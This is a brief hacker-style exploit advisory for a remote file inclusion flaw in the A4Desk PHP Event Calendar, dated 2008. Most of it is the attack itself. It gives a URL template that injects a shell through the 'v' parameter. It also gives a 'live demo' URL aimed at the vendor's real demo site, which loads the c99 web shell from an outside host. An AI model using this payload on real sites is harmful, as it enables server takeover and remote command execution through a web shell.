================================================================= ========A4Desk PHP Event Calendar Remote File Inclusion======== ================================================================= Vendor: WebUnion Media Ltd Vendor Site: http://php.a4desk.com/calendar/ Date Discovered: 9-29-08 Discovered By: Lo$er ====Vulnerable code==== Gonna pay (i got lucky finding this) ====RFI==== http://www.[site].com/[path]/index.php?date=&v=[shell]? ===Live Demo=== http://php.a4desk.com/calendar/demo/index.php?date=&v=http://www.evilc0der.com/c99.txt?